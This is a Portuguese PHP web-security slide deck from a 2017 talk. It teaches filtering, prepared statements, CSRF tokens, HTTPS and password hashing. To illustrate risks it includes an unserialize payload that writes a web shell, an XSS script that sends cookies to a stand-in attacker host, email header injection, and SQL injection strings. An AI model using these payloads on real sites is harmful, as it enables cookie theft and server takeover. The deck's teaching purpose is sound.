O documento discute estratégias de segurança para aplicações web PHP, abordando tópicos como: 1) planejamento de segurança, 2) melhorias no código, 3) filtragem de dados, 4) cuidados com uploads e formulários, 5) injeção de código, 6) cookies e sessões, 7) segurança no banco de dados, 8) HTTPS e 9) armazenamento seguro de senhas. O objetivo é fornecer uma introdução aos principais conceitos e boas práticas de segurança para desenvolvedores PHP.

1. PHP & Segurança
Blindando Aplicações Web
Rafael Jaques
@rafajaques
iMasters - PHP Experience 2017

2. “Conhecereis a verdade e a verdade vos libertará.”
João 8:32

3. Rafael Jaques
Professor do Instituto Federal de
Educação, Ciência e Tecnologia do Rio
Grande do Sul.
Graduado em Análise e
Desenvolvimento de Sistemas. Pós-
graduado em Gestão e Docência do
Ensino Superior.
Mestre em Educação.
Desenvolvedor web e viciado em
segurança.

4. www.php-rs.org

5. Um detalhe…
Não tem como falar de tudo :(
Mas eu tentei…

6. 1
Segurança da
informação

7. Pontos-chave da SI
Integridade
Confidencialidade
Disponibilidade

8. 2
Planejamento

9. Planejamento
Projete o seu sistema
Estude antes de implementar
Revise o que foi feito
Conheça o seu ambiente

10. Problemas no servidor
Defesa em
profundidade

11. Problemas no servidor
Lei do menor
privilégio

12. 3
Melhorando o código
desenvolvido

13. Como desenvolver um
bom código?

14. Tudo começa com
BOAS PRÁTICAS

15. Warning: Cannot modify header information -
headers already sent by (output started at /
path/to/script.php:1) in script.php on line 55
Omita as tags
de fechamento
Boas práticas

16. Utilize extensões
consistentes
Boas práticas
.php
.inc.php
.inc
.php~
.bak

17. Utilize extensões
consistentes
Boas práticas
.php
.inc.php
.inc
.php~
.bak
httpd.conf
AddType application/x-httpd-php .php .phtml

18. Nunca edite arquivos
em produção
Boas práticas

19. Funções perigosas
exec( )
Não execute bobagem no seu sistema
shell_exec( )
system( ) passthru( )
proc_*( )

20. Funções perigosas
exec( )
Não execute bobagem no seu sistema
shell_exec( )
system( ) passthru( )
proc_*( )
escapeshellcmd()
escapeshellarg()

21. Funções perigosas
serialize() unserialize( )

22. Ex.: https://speakerdeck.com/willdonohoe/practical-php-security
class Logger {
public $logFile;
public $buffer;
public $fh;
public function __destruct() {
$this->WriteBuffer();
}
public function WriteBuffer() {
if (!$this->fh) {
$this->fh = fopen($this->logFile, 'w');
}
fwrite($this->fh, $this->buffer);
}
// ...
}
// ...
$cookieData = unserialize($_COOKIE['data']);
// ...

23. O:6:"Logger":3:{s:7:"logFile";s:
8:"vish.php";s:6:"buffer";s:27:"<?php
system($_GET["mal"]);";s:2:"fh";N;}
Ex.: https://speakerdeck.com/willdonohoe/practical-php-security
Grava o arquivo vish.php com o conteúdo:
<?php system($_GET["mal"]);

24. Ex.: https://speakerdeck.com/willdonohoe/practical-php-security
Primeiro resultado ao procurar no Google por
php store array cookie

25. Seu ambiente
também precisa
de cuidado e
atenção

26. Configuração do ambiente
Headers
Podem denunciar o seu servidor
expose_php php.ini

27. Apache
ServerTokens
Prod Major Minor Min Os Full
Configuração do ambiente

28. $ lwp-request -edm GET sitedealguem.com.br
200 OK
[...]
Connection: close
Pragma: no-cache
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Meta-Revisit-After: 4 days
X-Powered-By: PHP/5.3.3-7+squeeze2

29. $ lwp-request -edm GET sitedealguem.com.br
200 OK
[...]
Connection: close
Pragma: no-cache
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Meta-Revisit-After: 4 days
X-Powered-By: PHP/5.3.3

31. Gerenciar os
erros pode
salvar seu dia!

32. Gerenciamento de erros
display_errors
error_reporting
log_errors
error_log
Mostrar erros na tela
Nível de erro mostrado
Logar erros
Arquivo de log

33. set_error_handler( )
error_log( )
Indica uma função para manipular erros
Loga um erro personalizado
Gerenciamento de erros

34. 4
Filtragem de
dados

35. Filtragem de dados
Bypass
Mistake Origin

36. Validate
Sanitize
filter_var( )
Validating && Sanitizing
Bloqueie valores indesejados
Filtragem de dados

37. filter_var()
php.net/filter.filters
FILTER_VALIDATE_* FILTER_SANITIZE_*
Validação de dados
Verifica se
determinado valor
encontra-se dentro dos
parâmetros esperados.
Limpeza de dados
Retira de um
determinado valor todos
os caracteres que
não são permitidos.

38. Validação
filter_var( , )$valor CONSTANTE_FILTRO
Valor filtrado
bool(false)

39. Validação
FILTER_VALIDATE_EMAIL
“rafa@php.net" string(12) “rafa@php.net” “1@2.3" bool(false)
5 bool(false) “1@2” bool(false)
“phpit.com.br” bool(false) “joao quem”@site.com
bool(false)

40. Validação
FILTER_VALIDATE_FLOAT
php.net/filter.filters.validate
FILTER_VALIDATE_BOOLEAN
FILTER_VALIDATE_IP
FILTER_VALIDATE_URL

41. Limpeza
FILTER_SANITIZE_URL
http://phpit.com.br
http://phpit.com.br£
phpitº.com.br
br¶
§
string(19) "http://phpit.com.br"
string(19) "http://phpit.com.br"
string(12) "phpit.com.br"
string(2) "br"
string(0) ""

42. FILTER_SANITIZE_STRING
uma string string(10) "uma string"
string(12) "uma string *"
string(21) "uma string&lt;tag&gt;"
Limpeza
<tag>uma string *
<tag>uma string&lt;tag&gt;

43. Limpeza
FILTER_SANITIZE_EMAIL
php.net/filter.filters.validate
FILTER_SANITIZE_SPECIAL_CHARS
FILTER_SANITIZE_ENCODED
FILTER_SANITIZE_NUMBER_INT

44. Cuidados com
Formulários

45. Spoofed Form Submissions
Cuidados com formulários

46. Abuso de form mail
Cuidados com formulários

47. Abusodeformmail
<?php
$cabecalhos = "From: {$_POST['nome']} <{$_POST['email']}>";
$para = "email@seguro.com";
$assunto = "Contato via site";
$corpo = $_POST['mensagem'];
mail($para, $assunto, $corpo, $cabecalhos);

48. Abusodeformmail
From: Fulaninho <meu@email.com>
To: email@seguro.com
Subject: Contato via site
Esta é a mensagem do e-mail
Esperado

49. Abusodeformmail
From: Fulaninho <meu@email.com>
To: email@seguro.com
Subject: Contato via site
Esta é a mensagem do e-mail
Esperado
FulaninhonBcc:um@email.com,spam@enviar.com,

50. Abusodeformmail
From: Fulaninho
Bcc: um@email.com, spam@enviar.com, <meu@email.com>
To: email@seguro.com
Subject: Contato via site
Aqui coloco uma mensagem de SPAM sobre viagra ou algo assim!
Possível

51. 5
Upload de
arquivos

52. MIME Type do $_FILES
Upload de arquivos

53. Verificar o tipo da imagem
exif_imagetype( )
Upload de arquivos

54. php.net/function.exif-imagetype
Upload de arquivos

55. Ressalvar imagens
Upload de arquivos

56. 6
Injeção
de código

57. XSSCross-SiteScripting

58. XSS
Cross-SiteScripting
<script>
document.location = "http://sitedomal.com?c=" + document.cookie
</script>

59. XSS
Cross-SiteScripting
Filtrar dados externos
Utilize as funções de filtro
Utilize uma white-list

60. htmlentities( ) strip_tags( )
XSS
Cross-SiteScripting
Utilize as funções de filtro
utf8_decode( ) filter_var( )

61. XSS
Cross-SiteScripting
Cuidado com injeção de CSS
expression( ) url( )
Métodos
específicos moz-
binding

62. CSRFCross-SiteRequestForgery

63. CSRF
Cross-SiteRequestForgery
http://meusite.com/voto.php?id=1
<img src="http://meusite.com/voto.php?id=1" />

64. CSRF
Cross-SiteRequestForgery
Exigir um token
Solicitar reautenticação
Prefira POST em vez de GET
Limite o tempo de sessão
Verificar Referer Force o uso de seus formulários
uniqid( )
$_SERVER['HTTP_REFERER']

65. Outros tipos de injeção
XPath LDAP
Bibliotecas de terceiros
Upload de arquivos

66. Indo além da
Validação de dados

67. Além da validação
Regras de negócio
Filtrou a entrada? Filtre a saída!
Não confie nos cookies!

68. 7
Segurança em
bancos de dados

69. SGBDs suportados pelo PHP
php.net/refs.database
dBaseDB++CUBRID
FrontBaseFireBird/InterbasefilePro
IngresInformixIBM DB2
mSQLMongoMaxDB
OracleMySQLM$ SQL
PostgreSQLParadoxOvrimos SQL
Tokyo TyrantSybaseSQLite

70. Conceitos básicos de
segurança em
Bancos de Dados

71. Lei do
Menor Privilégio

72. Não permita
Acesso Remoto

73. Prefira utilizar
UTF-8

74. Escapar caracteres
não é seguro
mysql_real_escape_string( )
addslashes( )

75. SQL e Blind SQL
Injection

76. SQLInjection

77. SQLInjection
Injeção de código SQL arbitrário dentro
de uma consulta legítima.

78. SQLInjection

79. SQLInjection
1' OR 1='1

80. SQLInjection
fulano'# ou fulano' --

81. extension:php mysql_query $_GET

82. SQLInjection
Blind

83. Injeção de código arbitrário sem
visualização da saída do banco.
BlindSQLInjection

84. Prepared Statements
e ORMs

85. Prepared Statements
Declarações preparadas
Compila as consultas SQL
Utiliza placeholders

86. Declarações preparadas
INSERT INTO produtos (nome, preco) VALUES (?, ?)
Prepared Statements

87. ORM
Object-relational mapping
Reduz a escrita de SQL
Acesso ao banco através de classes

88. ORMs

89. Exposição de
credenciais

90. O que acontece
se alguém tiver
acesso aos
seus arquivos?

91. E se o PHP
parar de
funcionar?

93. 8
Cookies e
sessions

94. Cookies são client-side
Sessions são server-side
Cookies e Sessions

95. Cliente Servidor
Requisição HTTP
Resposta HTTP + Set Cookie
Requisição HTTP
Resposta HTTP
Cookies e Sessions

96. Servidor
session_start()
Verifica se a sessão
existe
Procura pelo SESSID
em um cookie
Procura pelo SESSID
numa querystring
Busca os dados e cria
a $_SESSION
Sim
Sim
Não
Cria uma nova
SESSID
Não
Cookies e Sessions

97. Roubo de Cookie
(Cookie Theft)

98. Tome cuidado com
XSS

99. Cookies também
podem ser roubados
com sniffers
Proteja utilizando HTTPS

100. Vulnerabilidades
de Sessão

101. Dados de sessão podem ser
visualizados via sniff quando
não criptografado com HTTPS
Exposição de Sessão

102. Hospedagens compartilhadas podem
vazar dados dentro dos diretórios com
permissões de leitura a todos
Utilize session_set_save_handler() para alterar o
comportamento de gravação dos dados de sessão
Exposição de Sessão

103. Roubo de Sessão
(Session Hijacking)

104. É possível fixar um SID,
forjar ou até mesmo
capturar um cookie!
Roubo de Sessão

105. Algumas sugestões para evitar roubo de sessão (tente
equilibrar usabilidade e segurança):
Gerar tokens únicos por usuário
Verificar User-Agent e IP
Utilizar sessões apenas via cookies
Roubo de Sessão

106. Não sacrifique a
usabilidade do projeto!

108. não

109. 2FA, 3FA, 4FA…

110. 9
Tráfego na
web

111. Fluxo do tráfego
Cliente Servidor
Requisição HTTP
Resposta HTTP
Requisição HTTP
Resposta HTTP

112. Sniffers em
redes abertas

113. Wireshark

115. Configurando um
certificado SSL

116. http://www.phpit.com.br/artigos/configurando-ssl-
servidor-de-desenvolvimento-apache.phpit
Gerando um
certificado
para testes

118. Alternando entre
HTTP e HTTPS

119. Leves diferenças na
$_SERVER sob HTTPS

120. $_SERVER
[HTTP_HOST] => localhost
[SERVER_SOFTWARE] => Apache/2.2.22
[SERVER_NAME] => localhost
[SERVER_ADDR] => 127.0.0.1
[SERVER_PORT] => 80
[REMOTE_ADDR] => 127.0.0.1
[DOCUMENT_ROOT] => /var/www
HTTP
[HTTPS] => on
[SSL_TLS_SNI] => localhost
[HTTP_HOST] => localhost
[SERVER_SOFTWARE] => Apache/2.2.22
[SERVER_NAME] => localhost
[SERVER_ADDR] => 127.0.0.1
[SERVER_PORT] => 443
[REMOTE_ADDR] => 127.0.0.1
[DOCUMENT_ROOT] => /var/www
HTTPS

121. Force a utilização do
protocolo HTTPS
Via aplicação ou via apache

122. 10
Armazenando
senhas

123. md5…
sha1…

124. crypt
password_hash

125. <?php
$cript = password_hash('abacaxi', CRYPT_BLOWFISH, ['cost' => 12]);
// Exemplo: $2y$12$0VeJrCeppjPkEkxwuJNRRudT25GAUprLgzUHq5zX01G2LPJyZjixS
if (password_verify('abacaxi', $cript)) {
echo 'Senha OK';
} else {
echo 'Deu ruim!';
}

126. <?php
$senha = 'abacaxi';
$hash = '$2y$12$0VeJrCeppjPkEkxwuJNRRudT25GAUprLgzUHq5zX01G2LPJyZjixS';
// Pode aumentar conforme a capacidade do seu servidor evolui
$opcoes = ['cost' => 10];
// Verifica se a senha está OK
if (password_verify($senha, $hash)) {
// Se deu certo, verifica se a senha atende às novas
// opções (como algoritmo ou custo diferentes)
if (password_needs_rehash($hash, PASSWORD_DEFAULT, $opcoes)) {
// Gera uma senha nova para substituir a antiga
$novoHash = password_hash($senha, PASSWORD_DEFAULT, $opcoes);
}
}

127. É possível definir um salt,
mas não é recomendado!

128. 11
Aplicações de verificação
de vulnerabilidades

129. https://github.com/zaproxy/zaproxy

130. http://beefproject.com/

131. https://portswigger.net/burp/

132. http://www.commixproject.com/

133. https://github.com/jkingsman/Bishop

134. http://sqlmap.org/

135. https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
WebGoat - Aplicação Vulnerável para Estudo

136. Monitorar logs
Manter PHP atualizado
Frameworks
Segurança física
Últimas dicas

137. Sempre que possível, utilize
código refatorado
Exposição phpinfo()
Cuidados ao enviar e-mails
Segurança no sistema de arquivos
Últimas dicas

138. Obrigado!
Rafael Jaques
rafa@php.net
rafajaques.com.br / phpit.com.br
@rafajaques
speakerdeck.com/rafajaques
w
@

139. Imagens utilizadas
• https://flic.kr/p/5Ndwd8
• https://flic.kr/p/i3NEP6
• Icons made by Madebyoliver from
www.flaticon.com is licensed by CC 3.0 BY